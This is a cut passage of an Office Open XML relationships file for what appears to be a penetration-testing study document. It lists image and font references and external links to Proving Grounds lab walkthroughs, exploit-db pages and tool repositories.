Target="https://al1z4deh.medium.com/proving-grounds-fanatastic-b14a6e535e1f" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image493.png"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osintteam.blog/proving-grounds-sunsetdecoy-walkthrough-28108bcaecd9" TargetMode="External"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId1034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId1276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vk9-sec.com/disk-group-privilege-escalation" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hxlxmj/%EF%B8%8F-spidersociety-a-full-walkthrough-395ed6cd13f4" TargetMode="External"/><Relationship Id="rId1035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50911" TargetMode="External"/><Relationship Id="rId1277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image321.png"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId1036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b" TargetMode="External"/><Relationship Id="rId1278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId1026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image467.png"/><Relationship Id="rId1268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-69-proving-grounds-clue-91eb61a5af44" TargetMode="External"/><Relationship Id="rId1027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId1269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@manhon.keung/proving-grounds-practice-linux-box-clue-c5d3a3b825d2" TargetMode="External"/><Relationship Id="rId1028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image453.png"/><Relationship Id="rId1029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image506.png"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image436.png"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image262.png"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image547.png"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image465.png"/><Relationship Id="rId1260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId1261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-21-proving-grounds-clamav-774a396d568b" TargetMode="External"/><Relationship Id="rId1020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/openssl/openssl" TargetMode="External"/><Relationship Id="rId1262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4761" TargetMode="External"/><Relationship Id="rId1021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/openssl/openssl" TargetMode="External"/><Relationship Id="rId1263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-pelican-walkthrough-72190462e821" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image514.png"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId1022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Crypt_(C)" TargetMode="External"/><Relationship Id="rId1264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-ground-walkthrough-bratarina-e5b66dd4cc82" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Crypt_(C)" TargetMode="External"/><Relationship Id="rId1265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-ground-walkthrough-bratarina-e5b66dd4cc82" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://h0j3n.medium.com/vulnhub-vegeta-1-0-fceb0b58aa83" TargetMode="External"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mu.aktepe18/spx-proving-ground-walk-through-57590e101bc2" TargetMode="External"/><Relationship Id="rId1024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId1266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47984" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image403.png"/><Relationship Id="rId1025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image304.png"/><Relationship Id="rId1267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-bratarina-596deb95f8d9"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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.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RobotoMon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